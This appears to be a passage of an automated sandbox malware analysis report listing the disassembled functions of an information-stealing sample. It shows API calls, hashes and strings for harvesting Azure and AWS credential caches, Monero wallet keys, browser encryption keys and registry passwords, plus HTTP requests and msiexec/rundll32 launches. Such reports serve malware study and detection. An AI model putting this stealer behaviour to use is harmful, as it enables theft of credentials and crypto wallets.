                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: bb1abda554bb3f8d55e61348c9bae2b12601787974ef8617ab3b5a5f3a2a99a7
                              • Instruction ID: 94bf933d4352a251013be64099ce894169a574c2b749c7475c12795c5853ca1c
                              • Opcode Fuzzy Hash: bb1abda554bb3f8d55e61348c9bae2b12601787974ef8617ab3b5a5f3a2a99a7
                              • Instruction Fuzzy Hash: 5B41A3BA94021867DB54F770EC47FED733EAB26704F004498B645A60C2EEB45BC98B92
                              Function 00699010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                              Download Yara Rule
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0069906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: 29998bb1082106a528458819ae243223b2866c2c5e3afb183c3698b94150c29a
                              • Instruction ID: b7917b030109f85454c69e62425d2c74da53e66283b06753eeff3831c5abc2df
                              • Opcode Fuzzy Hash: 29998bb1082106a528458819ae243223b2866c2c5e3afb183c3698b94150c29a
                              • Instruction Fuzzy Hash: 0D71CAB5910208ABDB08EBE4DD89FEEB7BDFB48704F108518F515EB690DB34A905CB61
                              Function 00692E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 006931C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 0069335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 006934EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: a0e239f8fcd2ac92abe91e76dd30eb0eb593b512bd29506129933a608acba187
                              • Instruction ID: 6e3e8f0b1fa26100ff6e87184840aaefff08e8e2ad76550b821645d7392c3dd9
                              • Opcode Fuzzy Hash: a0e239f8fcd2ac92abe91e76dd30eb0eb593b512bd29506129933a608acba187
                              • Instruction Fuzzy Hash: 48120A718101189ADF49FBE0CD92EEEB7BEAF14300F50415DE50666591EF302B4ACFAA
                              Function 006952C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                                • Part of subcall function 00686280: InternetOpenA.WININET(006A0DFE,00000001,00000000,00000000,00000000), ref: 006862E1
                                • Part of subcall function 00686280: StrCmpCA.SHLWAPI(?,0148E838), ref: 00686303
                                • Part of subcall function 00686280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00686335
                                • Part of subcall function 00686280: HttpOpenRequestA.WININET(00000000,GET,?,0148DF30,00000000,00000000,00400100,00000000), ref: 00686385
                                • Part of subcall function 00686280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006863BF
                                • Part of subcall function 00686280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006863D1
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00695318
                              • lstrlen.KERNEL32(00000000), ref: 0069532F
                                • Part of subcall function 00698E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00695364
                              • lstrlen.KERNEL32(00000000), ref: 00695383
                              • lstrlen.KERNEL32(00000000), ref: 006953AE
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 5b602e37868a6b88f2cdd36d6f3596fde1c5a0465ad4f990caeedcef202edebc
                              • Instruction ID: c6a5f7d302daa504ead4f7fb43d2d0a59a422babd9e3a0be752854b48decbc6f
                              • Opcode Fuzzy Hash: 5b602e37868a6b88f2cdd36d6f3596fde1c5a0465ad4f990caeedcef202edebc
                              • Instruction Fuzzy Hash: A751EE709211489BDF58FFA0C996AED77BEAF11304F50401CF80A5B992DF346B46CB96
                              Function 006912D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 4c20b01a37fa20038019d7692e9c955c7ff3dece9c2f34556b93b35d874943fd
                              • Instruction ID: ec90d2d9eaa3b435079f5193e517ef74ad4aec75c11ddcdddfbb7036d1cf17c3
                              • Opcode Fuzzy Hash: 4c20b01a37fa20038019d7692e9c955c7ff3dece9c2f34556b93b35d874943fd
                              • Instruction Fuzzy Hash: 0CC1B4B590011D9BCF58EFA0DC89FEA73BEBF54304F10449DE40AA7641DA70AA85CFA5
                              Function 00694280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00698DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 006942EC
                              • lstrcat.KERNEL32(?,0148E5F0), ref: 0069430B
                              • lstrcat.KERNEL32(?,?), ref: 0069431F
                              • lstrcat.KERNEL32(?,0148D458), ref: 00694333
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 00698D90: GetFileAttributesA.KERNEL32(00000000,?,00681B54,?,?,006A564C,?,?,006A0E1F), ref: 00698D9F
                                • Part of subcall function 00689CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00689D39
                                • Part of subcall function 006899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006899EC
                                • Part of subcall function 006899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00689A11
                                • Part of subcall function 006899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00689A31
                                • Part of subcall function 006899C0: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 00689A5A
                                • Part of subcall function 006899C0: LocalFree.KERNEL32(0068148F), ref: 00689A90
                                • Part of subcall function 006899C0: CloseHandle.KERNEL32(000000FF), ref: 00689A9A
                                • Part of subcall function 006993C0: GlobalAlloc.KERNEL32(00000000,006943DD,006943DD), ref: 006993D3
                              • StrStrA.SHLWAPI(?,0148E548), ref: 006943F3
                              • GlobalFree.KERNEL32(?), ref: 00694512
                                • Part of subcall function 00689AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nh,00000000,00000000), ref: 00689AEF
                                • Part of subcall function 00689AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00684EEE,00000000,?), ref: 00689B01
                                • Part of subcall function 00689AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nh,00000000,00000000), ref: 00689B2A
                                • Part of subcall function 00689AC0: LocalFree.KERNEL32(?,?,?,?,00684EEE,00000000,?), ref: 00689B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 006944A3
                              • StrCmpCA.SHLWAPI(?,006A08D1), ref: 006944C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 006944D2
                              • lstrcat.KERNEL32(00000000,?), ref: 006944E5
                              • lstrcat.KERNEL32(00000000,006A0FB8), ref: 006944F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: c85ad2fe509f3a9ffd37bf362c7cb5daef36f17eb1c42fc801cb139655339cd4
                              • Instruction ID: 5fdce2f312b23a2341599b1e7a58186a371a690ba903138efe444d4327c048ec
                              • Opcode Fuzzy Hash: c85ad2fe509f3a9ffd37bf362c7cb5daef36f17eb1c42fc801cb139655339cd4
                              • Instruction Fuzzy Hash: F17122B6900208ABDF54EBE4DC86FEE73BEBB48304F044598F60597181EA35DB45CBA5
                              Function 00681310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 006812A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006812B4
                                • Part of subcall function 006812A0: RtlAllocateHeap.NTDLL(00000000), ref: 006812BB
                                • Part of subcall function 006812A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006812D7
                                • Part of subcall function 006812A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006812F5
                                • Part of subcall function 006812A0: RegCloseKey.ADVAPI32(?), ref: 006812FF
                              • lstrcat.KERNEL32(?,00000000), ref: 0068134F
                              • lstrlen.KERNEL32(?), ref: 0068135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00681377
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                                • Part of subcall function 00698B60: GetSystemTime.KERNEL32(006A0E1A,0148A5A0,006A05AE,?,?,006813F9,?,0000001A,006A0E1A,00000000,?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 00698B86
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00681465
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                                • Part of subcall function 006899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006899EC
                                • Part of subcall function 006899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00689A11
                                • Part of subcall function 006899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00689A31
                                • Part of subcall function 006899C0: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 00689A5A
                                • Part of subcall function 006899C0: LocalFree.KERNEL32(0068148F), ref: 00689A90
                                • Part of subcall function 006899C0: CloseHandle.KERNEL32(000000FF), ref: 00689A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 006814EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: b78886056738ad4ecd0d63770561e0394b749630219c8fc963ae19306ff30840
                              • Instruction ID: 36d7a8b16930d9f4dde8a97203ef0633f180337665a348b61a92c0ae188cf90d
                              • Opcode Fuzzy Hash: b78886056738ad4ecd0d63770561e0394b749630219c8fc963ae19306ff30840
                              • Instruction Fuzzy Hash: 9B5133B19501185BCB55FBA0DD92FED73BEAF54300F40419CB60A66481EE706B85CFAA
                              Function 006875D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 006872D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0068733A
                                • Part of subcall function 006872D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006873B1
                                • Part of subcall function 006872D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0068740D
                                • Part of subcall function 006872D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00687452
                                • Part of subcall function 006872D0: HeapFree.KERNEL32(00000000), ref: 00687459
                              • lstrcat.KERNEL32(00000000,006A17FC), ref: 00687606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00687648
                              • lstrcat.KERNEL32(00000000, : ), ref: 0068765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0068768F
                              • lstrcat.KERNEL32(00000000,006A1804), ref: 006876A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 006876D3
                              • lstrcat.KERNEL32(00000000,006A1808), ref: 006876ED
                              • task.LIBCPMTD ref: 006876FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: 1cd5b8b8600cc3dad25fa5869734a3c9993062d6d62c4f7878163db66ddaf8e4
                              • Instruction ID: f51693d4b855e5d0c9628e1b7c94bfd501517eb267a1faa20cb030b0aeac4a35
                              • Opcode Fuzzy Hash: 1cd5b8b8600cc3dad25fa5869734a3c9993062d6d62c4f7878163db66ddaf8e4
                              • Instruction Fuzzy Hash: 76313872900109DFCB48FBA4DC99DFE777AFB55305B244218F102A7290DE34E946CBA6
                              Function 00698100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0148E3F8,00000000,?,006A0E2C,00000000,?,00000000), ref: 00698130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00698137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00698158
                              • __aulldiv.LIBCMT ref: 00698172
                              • __aulldiv.LIBCMT ref: 00698180
                              • wsprintfA.USER32 ref: 006981AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
